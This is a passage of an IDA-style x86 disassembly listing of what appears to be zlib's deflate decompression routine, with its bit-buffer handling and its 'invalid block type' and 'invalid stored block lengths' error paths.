mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
mov [eax+34h], ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_409E20
add esp, 0Ch
jmp loc_40AD79
; ---------------------------------------------------------------------------
loc_40AC4B: ; CODE XREF: sub_40A04E+BA0�j
mov edx, [ebp+var_10]
mov dword ptr [edx], 8
loc_40AC54: ; CODE XREF: sub_40A04E+7E�j
; DATA XREF: HSho:0040AD9D�o
mov [ebp+arg_8], 1
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_C]
mov [eax+20h], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_24]
mov [edx+1Ch], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_2C]
mov [ecx+4], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
sub ecx, [eax]
mov edx, [ebp+arg_4]
mov eax, [edx+8]
add eax, ecx
mov ecx, [ebp+arg_4]
mov [ecx+8], eax
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
mov [edx], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov [ecx+34h], edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_409E20
add esp, 0Ch
jmp loc_40AD79
; ---------------------------------------------------------------------------
loc_40ACB6: ; CODE XREF: sub_40A04E+7E�j
; DATA XREF: HSho:0040ADA1�o
mov [ebp+arg_8], 0FFFFFFFDh
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_C]
mov [eax+20h], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_24]
mov [edx+1Ch], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_2C]
mov [ecx+4], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
sub ecx, [eax]
mov edx, [ebp+arg_4]
mov eax, [edx+8]
add eax, ecx
mov ecx, [ebp+arg_4]
mov [ecx+8], eax
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
mov [edx], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov [ecx+34h], edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_409E20
add esp, 0Ch
jmp short loc_40AD79
; ---------------------------------------------------------------------------
loc_40AD15: ; CODE XREF: sub_40A04E+75�j
mov [ebp+arg_8], 0FFFFFFFEh
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_C]
mov [eax+20h], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_24]
mov [edx+1Ch], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_2C]
mov [ecx+4], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
sub ecx, [eax]
mov edx, [ebp+arg_4]
mov eax, [edx+8]
add eax, ecx
mov ecx, [ebp+arg_4]
mov [ecx+8], eax
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
mov [edx], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov [ecx+34h], edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_409E20
add esp, 0Ch
jmp short loc_40AD79
; ---------------------------------------------------------------------------
loc_40AD74: ; CODE XREF: sub_40A04E+186�j
; sub_40A04E+2BF�j ...
jmp loc_40A0B7
; ---------------------------------------------------------------------------
loc_40AD79: ; CODE XREF: sub_40A04E+228�j
; sub_40A04E+3A6�j ...
mov esp, ebp
pop ebp
retn
sub_40A04E endp
; ---------------------------------------------------------------------------
off_40AD7D dd offset loc_40A0D3 ; DATA XREF: sub_40A04E+7E�r
dd offset loc_40A1FC
dd offset loc_40A3F9
dd offset loc_40A4FE
dd offset loc_40A6C5
dd offset loc_40A7B0
dd offset loc_40A9CC
dd offset loc_40AB6A
dd offset loc_40AC54
dd offset loc_40ACB6
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ADA5 proc near ; CODE XREF: sub_40ADBE+4E�p
; sub_40AF6D+10BC�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+arg_4]
mov edx, [ecx+28h]
push edx
mov eax, [ebp+arg_4]
call dword ptr [eax+24h]
add esp, 8
pop ebp
retn
sub_40ADA5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ADBE proc near ; CODE XREF: sub_40AE75+E9�p
; sub_40C2D5+D�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
jz short loc_40ADD2
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_0]
mov edx, [ecx+3Ch]
mov [eax], edx
loc_40ADD2: ; CODE XREF: sub_40ADBE+7�j
mov eax, [ebp+arg_0]
cmp dword ptr [eax], 4
jz short loc_40ADE2
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx], 5
jnz short loc_40ADF9
loc_40ADE2: ; CODE XREF: sub_40ADBE+1A�j
mov edx, [ebp+arg_0]
mov eax, [edx+0Ch]
push eax
mov ecx, [ebp+arg_4]
mov edx, [ecx+28h]
push edx
mov eax, [ebp+arg_4]
call dword ptr [eax+24h]
add esp, 8
loc_40ADF9: ; CODE XREF: sub_40ADBE+22�j
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx], 6
jnz short loc_40AE14
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
push ecx
call sub_40ADA5
add esp, 8
loc_40AE14: ; CODE XREF: sub_40ADBE+41�j
mov edx, [ebp+arg_0]
mov dword ptr [edx], 0
mov eax, [ebp+arg_0]
mov dword ptr [eax+1Ch], 0
mov ecx, [ebp+arg_0]
mov dword ptr [ecx+20h], 0
mov edx, [ebp+arg_0]
mov eax, [ebp+arg_0]
mov ecx, [eax+28h]
mov [edx+34h], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+arg_0]
mov ecx, [eax+34h]
mov [edx+30h], ecx
mov edx, [ebp+arg_0]
cmp dword ptr [edx+38h], 0
jz short loc_40AE73
push 0
push 0
push 0
mov eax, [ebp+arg_0]
call dword ptr [eax+38h]
add esp, 0Ch
mov ecx, [ebp+arg_0]
mov [ecx+3Ch], eax
mov edx, [ebp+arg_4]
mov eax, [ebp+arg_0]
mov ecx, [eax+3Ch]
mov [edx+30h], ecx
loc_40AE73: ; CODE XREF: sub_40ADBE+92�j
pop ebp
retn
sub_40ADBE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AE75 proc near ; CODE XREF: sub_40DAB5+13E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push 40h
push 1
mov eax, [ebp+arg_0]
mov ecx, [eax+28h]
push ecx
mov edx, [ebp+arg_0]
call dword ptr [edx+20h]
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40AE9E
mov eax, [ebp+var_4]
jmp loc_40AF69
; ---------------------------------------------------------------------------
loc_40AE9E: ; CODE XREF: sub_40AE75+1F�j
push 5A0h
push 8
mov eax, [ebp+arg_0]
mov ecx, [eax+28h]
push ecx
mov edx, [ebp+arg_0]
call dword ptr [edx+20h]
add esp, 0Ch
mov ecx, [ebp+var_4]
mov [ecx+24h], eax
mov edx, [ebp+var_4]
cmp dword ptr [edx+24h], 0
jnz short loc_40AEDF
mov eax, [ebp+var_4]
push eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+28h]
push edx
mov eax, [ebp+arg_0]
call dword ptr [eax+24h]
add esp, 8
xor eax, eax
jmp loc_40AF69
; ---------------------------------------------------------------------------
loc_40AEDF: ; CODE XREF: sub_40AE75+4D�j
mov ecx, [ebp+arg_8]
push ecx
push 1
mov edx, [ebp+arg_0]
mov eax, [edx+28h]
push eax
mov ecx, [ebp+arg_0]
call dword ptr [ecx+20h]
add esp, 0Ch
mov edx, [ebp+var_4]
mov [edx+28h], eax
mov eax, [ebp+var_4]
cmp dword ptr [eax+28h], 0
jnz short loc_40AF33
mov ecx, [ebp+var_4]
mov edx, [ecx+24h]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+28h]
push ecx
mov edx, [ebp+arg_0]
call dword ptr [edx+24h]
add esp, 8
mov eax, [ebp+var_4]
push eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+28h]
push edx
mov eax, [ebp+arg_0]
call dword ptr [eax+24h]
add esp, 8
xor eax, eax
jmp short loc_40AF69
; ---------------------------------------------------------------------------
loc_40AF33: ; CODE XREF: sub_40AE75+8D�j
mov ecx, [ebp+var_4]
mov edx, [ecx+28h]
add edx, [ebp+arg_8]
mov eax, [ebp+var_4]
mov [eax+2Ch], edx
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_4]
mov [ecx+38h], edx
mov eax, [ebp+var_4]
mov dword ptr [eax], 0
push 0
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_4]
push edx
call sub_40ADBE
add esp, 0Ch
mov eax, [ebp+var_4]
loc_40AF69: ; CODE XREF: sub_40AE75+24�j
; sub_40AE75+65�j ...
mov esp, ebp
pop ebp
retn
sub_40AE75 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AF6D proc near ; CODE XREF: sub_40DC35+3F3�p
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 7Ch
mov eax, [ebp+arg_4]
mov ecx, [eax]
mov [ebp+var_4], ecx
mov edx, [ebp+arg_4]
mov eax, [edx+4]
mov [ebp+var_1C], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+20h]
mov [ebp+var_C], edx
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov [ebp+var_14], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+34h]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
cmp edx, [ecx+30h]
jnb short loc_40AFBB
mov eax, [ebp+arg_0]
mov ecx, [eax+30h]
sub ecx, [ebp+var_8]
sub ecx, 1
mov [ebp+var_54], ecx
jmp short loc_40AFC7
; ---------------------------------------------------------------------------
loc_40AFBB: ; CODE XREF: sub_40AF6D+3B�j
mov edx, [ebp+arg_0]
mov eax, [edx+2Ch]
sub eax, [ebp+var_8]
mov [ebp+var_54], eax
loc_40AFC7: ; CODE XREF: sub_40AF6D+4C�j
mov ecx, [ebp+var_54]
mov [ebp+var_18], ecx
loc_40AFCD: ; CODE XREF: sub_40AF6D:loc_40C294�j
mov edx, [ebp+arg_0]
mov eax, [edx]
mov [ebp+var_58], eax
cmp [ebp+var_58], 9
ja loc_40C235
mov ecx, [ebp+var_58]
jmp off_40C29D[ecx*4]
loc_40AFE9: ; CODE XREF: sub_40AF6D+121�j
; DATA XREF: HSho:off_40C29D�o
cmp [ebp+var_14], 3
jnb loc_40B093
cmp [ebp+var_1C], 0
jz short loc_40B002
mov [ebp+arg_8], 0
jmp short loc_40B05D
; ---------------------------------------------------------------------------
loc_40B002: ; CODE XREF: sub_40AF6D+8A�j
mov edx, [ebp+arg_0]
mov eax, [ebp+var_C]
mov [edx+20h], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_14]
mov [ecx+1Ch], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_1C]
mov [eax+4], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
sub eax, [edx]
mov ecx, [ebp+arg_4]
mov edx, [ecx+8]
add edx, eax
mov eax, [ebp+arg_4]
mov [eax+8], edx
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
mov [ecx], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
mov [eax+34h], ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_409E20
add esp, 0Ch
jmp loc_40C299
; ---------------------------------------------------------------------------
loc_40B05D: ; CODE XREF: sub_40AF6D+93�j
mov edx, [ebp+var_1C]
sub edx, 1
mov [ebp+var_1C], edx
mov eax, [ebp+var_4]
xor ecx, ecx
mov cl, [eax]
mov edx, ecx
mov ecx, [ebp+var_14]
shl edx, cl
mov eax, [ebp+var_C]
or eax, edx
mov [ebp+var_C], eax
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_14]
add edx, 8
mov [ebp+var_14], edx
jmp loc_40AFE9
; ---------------------------------------------------------------------------
loc_40B093: ; CODE XREF: sub_40AF6D+80�j
mov eax, [ebp+var_C]
and eax, 7
mov [ebp+var_10], eax
mov ecx, [ebp+var_10]
and ecx, 1
mov edx, [ebp+arg_0]
mov [edx+18h], ecx
mov eax, [ebp+var_10]
shr eax, 1
mov [ebp+var_5C], eax
cmp [ebp+var_5C], 3
ja loc_40B271
mov ecx, [ebp+var_5C]
jmp off_40C2C5[ecx*4]
loc_40B0C4: ; CODE XREF: sub_40AF6D+75�j
; DATA XREF: HSho:off_40C2C5�o
mov edx, [ebp+var_C]
shr edx, 3
mov [ebp+var_C], edx
mov eax, [ebp+var_14]
sub eax, 3
mov [ebp+var_14], eax
mov ecx, [ebp+var_14]
and ecx, 7
mov [ebp+var_10], ecx
mov edx, [ebp+var_C]
mov ecx, [ebp+var_10]
shr edx, cl
mov [ebp+var_C], edx
mov eax, [ebp+var_14]
sub eax, [ebp+var_10]
mov [ebp+var_14], eax
mov ecx, [ebp+arg_0]
mov dword ptr [ecx], 1
jmp loc_40B271
; ---------------------------------------------------------------------------
loc_40B101: ; CODE XREF: sub_40AF6D+75�j
; sub_40AF6D+150�j
; DATA XREF: ...
mov edx, [ebp+arg_4]
push edx
lea eax, [ebp+var_2C]
push eax
lea ecx, [ebp+var_24]
push ecx
lea edx, [ebp+var_20]
push edx
lea eax, [ebp+var_28]
push eax
call sub_40CE2B
add esp, 14h
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+var_2C]
push edx
mov eax, [ebp+var_24]
push eax
mov ecx, [ebp+var_20]
push ecx
mov edx, [ebp+var_28]
push edx
call sub_409FF9
add esp, 14h
mov ecx, [ebp+arg_0]
mov [ecx+4], eax
mov edx, [ebp+arg_0]
cmp dword ptr [edx+4], 0
jnz short loc_40B1AA
mov [ebp+arg_8], 0FFFFFFFCh
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_C]
mov [eax+20h], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_14]
mov [edx+1Ch], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_1C]
mov [ecx+4], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
sub ecx, [eax]
mov edx, [ebp+arg_4]
mov eax, [edx+8]
add eax, ecx
mov ecx, [ebp+arg_4]
mov [ecx+8], eax
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
mov [edx], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov [ecx+34h], edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_409E20
add esp, 0Ch
jmp loc_40C299
; ---------------------------------------------------------------------------
loc_40B1AA: ; CODE XREF: sub_40AF6D+1D9�j
mov eax, [ebp+var_C]
shr eax, 3
mov [ebp+var_C], eax
mov ecx, [ebp+var_14]
sub ecx, 3
mov [ebp+var_14], ecx
mov edx, [ebp+arg_0]
mov dword ptr [edx], 6
jmp loc_40B271
; ---------------------------------------------------------------------------
loc_40B1CA: ; CODE XREF: sub_40AF6D+75�j
; sub_40AF6D+150�j
; DATA XREF: ...
mov eax, [ebp+var_C]
shr eax, 3
mov [ebp+var_C], eax
mov ecx, [ebp+var_14]
sub ecx, 3
mov [ebp+var_14], ecx
mov edx, [ebp+arg_0]
mov dword ptr [edx], 3
jmp loc_40B271
; ---------------------------------------------------------------------------
loc_40B1EA: ; CODE XREF: sub_40AF6D+75�j
; sub_40AF6D+150�j
; DATA XREF: ...
mov eax, [ebp+var_C]
shr eax, 3
mov [ebp+var_C], eax
mov ecx, [ebp+var_14]
sub ecx, 3
mov [ebp+var_14], ecx
mov edx, [ebp+arg_0]
mov dword ptr [edx], 9
mov eax, [ebp+arg_4]
mov dword ptr [eax+18h], offset aInvalidBlockTy ; "invalid block type"
mov [ebp+arg_8], 0FFFFFFFDh
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_1C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_409E20
add esp, 0Ch
jmp loc_40C299
; ---------------------------------------------------------------------------
loc_40B271: ; CODE XREF: sub_40AF6D+147�j
; sub_40AF6D+18F�j ...
jmp loc_40C294
; ---------------------------------------------------------------------------
loc_40B276: ; CODE XREF: sub_40AF6D+75�j
; sub_40AF6D+3AC�j
; DATA XREF: ...
cmp [ebp+var_14], 20h
jnb loc_40B31E
cmp [ebp+var_1C], 0
jz short loc_40B28F
mov [ebp+arg_8], 0
jmp short loc_40B2EA
; ---------------------------------------------------------------------------
loc_40B28F: ; CODE XREF: sub_40AF6D+317�j
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_1C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_409E20
add esp, 0Ch
jmp loc_40C299
; ---------------------------------------------------------------------------
loc_40B2EA: ; CODE XREF: sub_40AF6D+320�j
mov ecx, [ebp+var_1C]
sub ecx, 1
mov [ebp+var_1C], ecx
mov edx, [ebp+var_4]
xor eax, eax
mov al, [edx]
mov ecx, [ebp+var_14]
shl eax, cl
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+var_14]
add eax, 8
mov [ebp+var_14], eax
jmp loc_40B276
; ---------------------------------------------------------------------------
loc_40B31E: ; CODE XREF: sub_40AF6D+30D�j
mov ecx, [ebp+var_C]
not ecx
shr ecx, 10h
and ecx, 0FFFFh
mov edx, [ebp+var_C]
and edx, 0FFFFh
cmp ecx, edx
jz short loc_40B3AE
mov eax, [ebp+arg_0]
mov dword ptr [eax], 9
mov ecx, [ebp+arg_4]
mov dword ptr [ecx+18h], offset aInvalidStoredB ; "invalid stored block lengths"
mov [ebp+arg_8], 0FFFFFFFDh
mov edx, [ebp+arg_0]
mov eax, [ebp+var_C]
mov [edx+20h], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_14]
mov [ecx+1Ch], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_1C]
mov [eax+4], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
sub eax, [edx]
mov ecx, [ebp+arg_4]
mov edx, [ecx+8]
add edx, eax
mov eax, [ebp+arg_4]
mov [eax+8], edx
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
mov [ecx], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
mov [eax+34h], ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_409E20
add esp, 0Ch
jmp loc_40C299
; ---------------------------------------------------------------------------
loc_40B3AE: ; CODE XREF: sub_40AF6D+3CA�j
mov edx, [ebp+var_C]
and edx, 0FFFFh
mov eax, [ebp+arg_0]
mov [eax+4], edx
mov [ebp+var_14], 0
mov ecx, [ebp+var_14]
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
cmp dword ptr [edx+4], 0
jz short loc_40B3DC
mov [ebp+var_60], 2
jmp short loc_40B3EC
; ---------------------------------------------------------------------------
loc_40B3DC: ; CODE XREF: sub_40AF6D+464�j
mov eax, [ebp+arg_0]
mov ecx, [eax+18h]
neg ecx
sbb ecx, ecx
and ecx, 7
mov [ebp+var_60], ecx
loc_40B3EC: ; CODE XREF: sub_40AF6D+46D�j
mov edx, [ebp+arg_0]
mov eax, [ebp+var_60]
mov [edx], eax
jmp loc_40C294
; ---------------------------------------------------------------------------
loc_40B3F9: ; CODE XREF: sub_40AF6D+75�j
; DATA XREF: HSho:0040C2A5�o
cmp [ebp+var_1C], 0
jnz short loc_40B45A
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_1C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_409E20
add esp, 0Ch
jmp loc_40C299
; ---------------------------------------------------------------------------
loc_40B45A: ; CODE XREF: sub_40AF6D+490�j
cmp [ebp+var_18], 0
jnz loc_40B5C6
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
cmp edx, [ecx+2Ch]
jnz short loc_40B4B4
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_0]
mov edx, [eax+30h]
cmp edx, [ecx+28h]
jz short loc_40B4B4
mov eax, [ebp+arg_0]
mov ecx, [eax+28h]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
cmp eax, [edx+30h]
jnb short loc_40B4A2
mov ecx, [ebp+arg_0]
mov edx, [ecx+30h]
sub edx, [ebp+var_8]
sub edx, 1
mov [ebp+var_64], edx
jmp short loc_40B4AE
; ---------------------------------------------------------------------------
loc_40B4A2: ; CODE XREF: sub_40AF6D+522�j
mov eax, [ebp+arg_0]
mov ecx, [eax+2Ch]
sub ecx, [ebp+var_8]
mov [ebp+var_64], ecx
loc_40B4AE: ; CODE XREF: sub_40AF6D+533�j
mov edx, [ebp+var_64]
mov [ebp+var_18], edx
loc_40B4B4: ; CODE XREF: sub_40AF6D+500�j
; sub_40AF6D+50E�j
cmp [ebp+var_18], 0
jnz loc_40B5C6
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
mov [eax+34h], ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_409E20
add esp, 0Ch
mov [ebp+arg_8], eax
mov edx, [ebp+arg_0]
mov eax, [edx+34h]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
cmp edx, [ecx+30h]
jnb short loc_40B503
mov eax, [ebp+arg_0]
mov ecx, [eax+30h]
sub ecx, [ebp+var_8]
sub ecx, 1
mov [ebp+var_68], ecx
jmp short loc_40B50F
; ---------------------------------------------------------------------------
loc_40B503: ; CODE XREF: sub_40AF6D+583�j
mov edx, [ebp+arg_0]
mov eax, [edx+2Ch]
sub eax, [ebp+var_8]
mov [ebp+var_68], eax
loc_40B50F: ; CODE XREF: sub_40AF6D+594�j
mov ecx, [ebp+var_68]
mov [ebp+var_18], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
cmp eax, [edx+2Ch]
jnz short loc_40B565
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_0]
mov eax, [ecx+30h]
cmp eax, [edx+28h]
jz short loc_40B565
mov ecx, [ebp+arg_0]
mov edx, [ecx+28h]
mov [ebp+var_8], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
cmp ecx, [eax+30h]
jnb short loc_40B553
mov edx, [ebp+arg_0]
mov eax, [edx+30h]
sub eax, [ebp+var_8]
sub eax, 1
mov [ebp+var_6C], eax
jmp short loc_40B55F
; ---------------------------------------------------------------------------
loc_40B553: ; CODE XREF: sub_40AF6D+5D3�j
mov ecx, [ebp+arg_0]
mov edx, [ecx+2Ch]
sub edx, [ebp+var_8]
mov [ebp+var_6C], edx
loc_40B55F: ; CODE XREF: sub_40AF6D+5E4�j
mov eax, [ebp+var_6C]
mov [ebp+var_18], eax
loc_40B565: ; CODE XREF: sub_40AF6D+5B1�j
; sub_40AF6D+5BF�j
cmp [ebp+var_18], 0
jnz short loc_40B5C6
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_1C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_409E20
add esp, 0Ch
jmp loc_40C299
; ---------------------------------------------------------------------------
loc_40B5C6: ; CODE XREF: sub_40AF6D+4F1�j
; sub_40AF6D+54B�j ...
mov [ebp+arg_8], 0
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
cmp eax, [ebp+var_1C]
jbe short loc_40B5E4
mov ecx, [ebp+var_1C]
mov [ebp+var_10], ecx
loc_40B5E4: ; CODE XREF: sub_40AF6D+66F�j
mov edx, [ebp+var_10]
cmp edx, [ebp+var_18]
jbe short loc_40B5F2
mov eax, [ebp+var_18]
mov [ebp+var_10], eax
loc_40B5F2: ; CODE XREF: sub_40AF6D+67D�j
mov ecx, [ebp+var_10]
push ecx
mov edx, [ebp+var_4]
push edx
mov eax, [ebp+var_8]
push eax
call sub_411634 ; memcpy
add esp, 0Ch
mov ecx, [ebp+var_4]
add ecx, [ebp+var_10]
mov [ebp+var_4], ecx
mov edx, [ebp+var_1C]
sub edx, [ebp+var_10]
mov [ebp+var_1C], edx
mov eax, [ebp+var_8]
add eax, [ebp+var_10]
mov [ebp+var_8], eax
mov ecx, [ebp+var_18]
sub ecx, [ebp+var_10]
mov [ebp+var_18], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+4]
sub eax, [ebp+var_10]
mov ecx, [ebp+arg_0]
mov [ecx+4], eax
mov edx, [ebp+arg_0]
cmp dword ptr [edx+4], 0
jz short loc_40B647
jmp loc_40C294
; ---------------------------------------------------------------------------
loc_40B647: ; CODE XREF: sub_40AF6D+6D3�j
mov eax, [ebp+arg_0]
mov ecx, [eax+18h]
neg ecx
sbb ecx, ecx
and ecx, 7
mov edx, [ebp+arg_0]
mov [edx], ecx
jmp loc_40C294
; ---------------------------------------------------------------------------
loc_40B65E: ; CODE XREF: sub_40AF6D+75�j
; sub_40AF6D+794�j
; DATA XREF: ...
cmp [ebp+var_14], 0Eh
jnb loc_40B706
cmp [ebp+var_1C], 0
jz short loc_40B677
mov [ebp+arg_8], 0
jmp short loc_40B6D2
; ---------------------------------------------------------------------------
